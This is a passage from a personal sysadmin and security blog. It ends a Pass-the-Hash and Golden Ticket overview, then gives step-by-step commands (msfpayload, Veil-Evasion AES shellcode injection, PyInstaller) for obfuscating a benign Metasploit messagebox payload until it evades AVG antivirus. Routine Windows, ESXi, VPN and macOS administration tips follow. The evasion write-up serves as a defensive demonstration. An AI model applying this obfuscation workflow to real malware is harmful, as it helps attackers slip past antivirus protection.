A special case I want to highlight is the Golden Ticket attack. If an attacker obtained the NTLM hash of the KRBTGT domain account he can create a so called Golden Ticket. This is nothing else than a valid self created Kerberos Ticket Granting Ticket (TGT). With that ticket it is not only possible to impersonate as some else but it is also possible to authorise yourself. It is basically an attackers dream. The video below shows that attack in action.

Final Thoughts

For an attacker or pentester Pash the Hash styled attacks are a very valueable attack vector. Virtually all companies are prone to it as single sign on is used by many of the most business critical applications. Furthermore it often allows an attacker to rapidly elevate his priviledges after obtaining initial access to a low profile client.

Although Microsoft already actively participates in the ongoing debate about Pass the Hash it is still a long road before all organisations understand the associated risks. I have commited myself to actively point people to Microsoft’s Pass-the-Hash portal so that the words spreads a little faster.

If you have any questions or additional input please leave a comment below.

Your Toolbox

Finally here is a list of applications and the corresponding documentation for your further reading. All this links really helped me to deeply understand Pass the Hash styled attacks and to write this summary. Hereby I want to thank all the authors for their great job!


General Documentation

mimikatz Specific Documentation

Apr 272015

Recently some colleagues and I discussed the possibility to obfuscate known malware samples so that they successfully pass a virus scan. This works because most scanning engines detect threats due to their signature. These signatures in turn are based on the program code of the malware. An attacker can now modify or obfuscate the source code of already known malware and thereby avoids detection.

As we were unsure about the real-world feasability and the ease of use of the available obfuscation tools I decided to test one of them: The Veil-Framework. To do so I set up a fully patched Windows 7 Professional 32Bit VM secured with AVG AntiVirus FREE 2015 with the goal to modify a previously detected and blocked malware so that it sucessfully executes.

Creating the malware

The first thing I had to do was to create a malware for this test. As I wanted a “safe” malware, I decided to use the Metasploit windows/messagebox payload. It only opens a messagebox but it is detected as malicious by many scanners.

To ensure that we use exactly the same source for all further tests I used the msfpayload command line utility to create a Windows application (malware.exe) and to dump the corresponding raw shellcode (malware.raw)

msfpayload windows/messagebox TITLE="Malware" TEXT="Malware executed" ICON="WARNING" X >malware.exe
msfpayload windows/messagebox TITLE="Malware" TEXT="Malware executed" ICON="WARNING" R >malware.raw

As expected, the unobfuscated malware (malware.exe) was immediately detected by the AVG scanning engine:

2015-04-25_21h54_35So let’s move on to modify our malware by …

Obfuscating the Shellcode

To do so we use Veil-Evasion that is part of the Veil-Framework. The following command creates an obfuscated python script that contains the original AES encrypted shellcode with the help of the python/shellcode_inject/aes_encrypt payload.

./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -c compile_to_exe=no --overwrite -o obfuscated_malware

Before the obfuscation progress starts we have to provide the previously created raw shellcode of our malware:


Veil-Evasion supports many different programming languages (C, CS, Powershell, Python, …) and methods (shellcode injection, different meterpreter payloads, …) for obfuscation. For an up-to-date list browse the payloads subfolder in the source code repository.

Although the Veil-Framework is capable of directly creating a Windows application I had some problems with the thereto necessary Wine installation. As a workaround I simply copied the obfuscated malware to my Windows computer and used PyInstaller to convert it there to a self contained application.

C:\Temp>C:\Python27\Scripts\pyinstaller.exe --onefile obfuscated_malware.py

In the background PyInstaller analyses the Python script and packs all the necessary modules and libraries including the Python Runtime into a single and redistributable Windows application.

Playing Hide & Seek

Finally I copied the newly obfuscated malware to the test machine and double clicked it. To my pleasure, it passed the on-access virus scan and executed.


As I was eager to know how well I masked my “malicious” intends I uploaded the file to VirusTotal. Although it was detected by 7 out of 56 scanners this is still a major improvement over the initial 35 detections.


With this demo I clearly showed that it is fairly easy for malware applications to avoid detection from off-the-shelf virus scanners by using obfuscation. This targeted attacks are hard to mitigate and they require special security tools with for example virtualisation and malware analysis capabilities to do so. The good thing is that modified malware will most likely be detected by virus scanners within days after their initial deployments. Additionally more and more engines already detect the obfuscation itself and also block the file.

This all boils down to the fact that virus scanners are only one tool in the ongoing fight for protecting your critical infrastructure.

Mar 262015

Cygwin is a great tool to run Linux application on Windows. I primarly use it to run my already written shell scripts. What I always missed was the ability to launch shell scripts with a simple double click. However this is very easy to setup. Just right click on a .sh file and select “Open with…”. Now browse to “C:\cygwin(64)\bin” and select mintty.exe. Don’t forget to check the checkbox at the bottom of the dialog to always use the selected application. From now on just double click any .sh file and it gets executed automatically.


Nov 272014

Connection DiagramI’m responsible for several VMware ESXi hosts that are secured using a Bastion host. These Bastion hosts help to protect our client’s infrastructure and only allow access over some specifically enabled network protocols.

It’s clear that they don’t allow traffic from the Internet to our VMware ESXi systems, so we have to go a different route to manage them. Fortunately we can connect to our Bastion host using SSH and then tunnel the vSphere connection from the client machine to the ESXi system. The diagram on the right shows the corresponding data flow. This post will focus on the necessary configuration as I always forget how to setup a new client machine.

Before we start, here’s a screenshot that summarises all the steps:
ESXi over SSH Steps

1.) hosts File

The first thing you need to do is to add a new localhost alias in your hosts file. If you don’t know where to find it or how to modify it, check out this great article. At the bottom of the file append the following line:	esxilocal

2.) Connect to your Bastion host

Now connect to your Bastion host using a client that supports SSH Tunneling. I always go with PuTTY.

3.) Tunnel Configuration

In the next step we have to configure the three necessary tunnels. For the vSphere Client to successfully connect we have to forward the TCP ports 443, 902 and 903. Please ensure that you use the same ports locally.

4.) Connect

If you have setup everything correctly you are now able to connect over the SSH connection. Be aware that you have to use the hostname that you configured in the first step (like esxilocal) not the machine’s real one.

Congratulation, that’s it!

Oct 232014

Screen Shot 2014-10-23 at 16.17.09Currently I’m busy building several automated workflows that run on our flow:rage Video Storage System and that move files and directories from A to B while processing them in some way.

During qualifying this workflows for production we discovered that moved items were not immediately visible for Windows clients connected using SMB. Sometimes it took several minutes for the files and directories to show up. Even manually refreshing the parent folder did not help. Linux and OS X clients were not affected by this issue and so it was clear that this had to be a client side caching problem.

My google-fu helped me to find the TechNet article SMB2 Client Redirector Caches Explained that explains the Windows SMB2 Cache and it’s configuration options. Based on the I created the following .reg file [download]:

Windows Registry Editor Version 5.00


This configuration change disables the client side directory content cache. That means that file and directory changes are immediately visible for the client. This was exactly what I needed to solve my issue. However be aware that this change causes the client to contact the server more frequently.

Oct 072014

We have several smaller customers that use a VMware ESXi host with just a single Windows Server VM. To backup these VMs we often use either Windows Backup or a third party application running within the guest that saves all important data to an external USB drive. To be prepared for things like water damage we always suggest to use two rotating disks with one stored securely at another location.

USB Pass-throughThe problem here is that many of our customers are not very tech savvy and they generally don’t want to change anything on the server. That means I had to find a way so that they just have to replace the physical USB backup drive and don’t have to think about how the USB drive is forwarded to the VM.

To solve this I use the PCI pass-through option on the ESXi server. The screenshot on the right shows how that looks on an ESXi 5.0. After shutting down the VM add a new PCI device and select the USB controller of the host system. After switching the VM back on you can connect any device to any USB interface on the host and everything is forwarded automatically. However be aware that only a single VM can access the USB ports because you can forward a PCI device only once.

Another solution regarding USB devices is discussed in the VMware KB entry “USB support in ESXi/ESX 4.1 and ESXi 5.x“.

Jul 302013

It sounds like a simple task to configure a Windows client to connect to a L2TP/IPsec server hosted by Mac OS Server. However it’s not.


To setup the connection you need the following informations:

  • Username and password of a VPN enabled account
  • the L2TP/IPsec shared secret
  • official IP or hostname of the VPN server
  • Administrator account on the Windows machine


The first step it the most important one. Open the registry editor (regedit) on the Windows PC as administrator and add the DWORD AssumeUDPEncapsulationContextOnSendRule with a hex value of 00000002 within HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\PolicyAgent. To apply the changes you have to reboot.

Then add a new VPN connection using the Set up new connection or network assistant in the Network and Sharing Center. Be sure to enable the checkbox Don’t connect now, just set it up so I can connect later.

To finish the last step open the Properties dialog of your newly created VPN connection. Within the Security tap change the type to L2TP/IPsec and set the shared secret within the Advanced settings. Furthermore change the dropdown menu Data encryption to Optional encryption.

Now you are able to connect to the VPN service!

Dec 212012

Mac OS X extensively uses file metadata. As this post explains there are two fallback mechanisms if a volume is not able to handle this data.

On the one hand .DS_Store files are created to store mostly Finder specific settings. On the other hand metadata like resource forks or creator types are stored in “Dot Underscore” Files. For example the metadata for the file “Demo.avb” is stored in “._Demo.avb”. Both mechanisms are great in an all Mac environment but can cause troubles in mixed setups. Luckily there are ways to at least minimize the pain.


Even Apple thought that this files are not always necessary and build in a setting to disable the creation on network drives.

defaults write com.apple.desktopservices DSDontWriteNetworkStores true

Furthermore the guys from BinaryAge (the creators of the epic TotalFinder) build a tool called Asepsis. It is used to redirect all .DS_Store files into a folder buried in the depth of the system. Thereby the Finder is still able to store folder specific settings but external drives aren’t effected anymore.

Dot Underscore Files…

… cause more trouble. As they eventually store application specific data there is no official way to disable them. A possible workaround is to schedule a script to delete them (every night). This is exactly what I did for Windows (Powershell script) and Unix (Bash script) operating systems. On Windows the script can be scheduled using the “Scheduled Tasks” system setting. On Mac OS X a launchd configuration should be used – it can easily be created using Lingon. Other Unix operating systems can use a cronjob!

The script recursively searches a given folder for Dot Underscore Files and deletes them. Be aware they will most likely be recreated! You can download the Windows and Unix version using this link.